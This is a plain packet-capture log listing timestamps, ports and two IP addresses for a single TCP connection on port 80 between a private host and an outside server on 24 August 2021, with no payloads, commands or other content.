Aug 24, 2021 08:49:20.084769011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084784985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084795952 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084799051 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084805012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084821939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084837914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084853888 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084865093 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084868908 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084870100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084886074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084902048 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084918976 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084925890 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084928989 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.084938049 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084955931 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084970951 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.084986925 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085001945 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085015059 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.085016966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085020065 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.085033894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085048914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085067987 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085071087 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.085072994 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.085084915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085099936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085115910 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085131884 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.085135937 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.085138083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085154057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085170984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085187912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085203886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085211992 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.085216999 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.085221052 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085237980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085257053 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085274935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085278034 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.085282087 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.085289955 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085306883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085321903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085338116 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085350037 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.085355043 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.085355043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085371971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085391045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085410118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085417986 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.085421085 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.085427046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085443020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085459948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085474968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085491896 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085498095 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.085500956 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.085508108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085527897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085545063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085561991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085580111 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085589886 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.085593939 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.085596085 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085612059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085629940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085645914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085655928 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.085659981 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.085665941 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085684061 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085706949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.085714102 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.085716963 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.085772991 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.088713884 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.089251041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.093558073 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.093580008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.093616962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.093636036 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.093652964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.093668938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.093684912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.093702078 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.093727112 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.093741894 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.093744040 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.093744993 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.093761921 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.093777895 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.093781948 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.093796968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.093815088 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.093831062 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.093847036 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.093863010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.093868971 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.093872070 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.093878984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.093894958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.093909979 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.093934059 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.093938112 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.095169067 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.100994110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.101363897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.101408958 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.101497889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.101516008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.101531982 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.101547956 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.101567984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.101586103 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.101588964 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.101598024 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.101630926 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.101650953 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.101667881 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.101682901 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.101687908 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.101691961 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.101701021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.101716995 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.101733923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.101746082 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.101777077 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.101779938 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.101876974 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.102345943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.102479935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.102497101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.102513075 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.102530003 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.102533102 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.102549076 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.102566957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.102582932 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.102617979 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.102618933 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.102622986 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.102637053 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.102652073 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.102664948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.102682114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.102690935 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.102694988 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.102700949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.102718115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.102734089 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.102756023 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.102758884 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.102845907 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.103178978 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.103240967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.103256941 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.103269100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.103281975 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.103297949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.103313923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.103323936 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.103326082 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.103357077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.103374958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.103387117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.103399038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.103434086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.103451967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.103465080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.103468895 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.103477001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.103509903 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.103604078 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.103638887 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.104679108 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.105736017 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.107816935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.107836008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.107855082 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.107872009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.107887030 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.107904911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.107917070 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.107918024 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.107925892 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.107935905 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.107958078 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.107964039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.107974052 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108001947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108019114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108036041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108052969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108069897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108072042 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108086109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108103991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108113050 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108117104 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108118057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108129978 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108143091 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108159065 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108170033 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108174086 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108175993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108192921 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108210087 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108228922 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108247042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108256102 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108258963 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108264923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108280897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108297110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108308077 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108311892 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108313084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108330011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108345985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108364105 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108365059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108369112 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108382940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108398914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108416080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108429909 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108433008 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108433008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108448982 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108464956 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108481884 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108500957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108519077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108520031 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108524084 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108536005 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108552933 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108568907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108572006 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108576059 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108586073 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108596087 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108613968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108629942 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108645916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108656883 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108658075 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108659983 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108675003 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108690977 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108706951 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108714104 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108719110 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108725071 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108738899 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108752012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108764887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108777046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108788967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108802080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108819008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108830929 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108831882 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108835936 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108841896 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108855009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108867884 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108884096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108900070 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108920097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108922005 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108926058 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.108942986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108949900 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108963013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108978987 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.108994961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109003067 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109010935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109026909 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109042883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109059095 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109060049 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109062910 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109080076 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109102011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109114885 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109117985 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109122038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109142065 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109162092 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109178066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109194994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109199047 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109203100 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109208107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109224081 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109241009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109257936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109268904 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109272003 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109275103 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109291077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109311104 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109328985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109339952 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109344006 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109344959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109363079 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109380960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109391928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109409094 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109421015 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109424114 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109426022 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109438896 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109455109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109473944 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109483004 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109487057 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109492064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109508038 CEST	80	49712	212.224.105.79	192.168.2.5
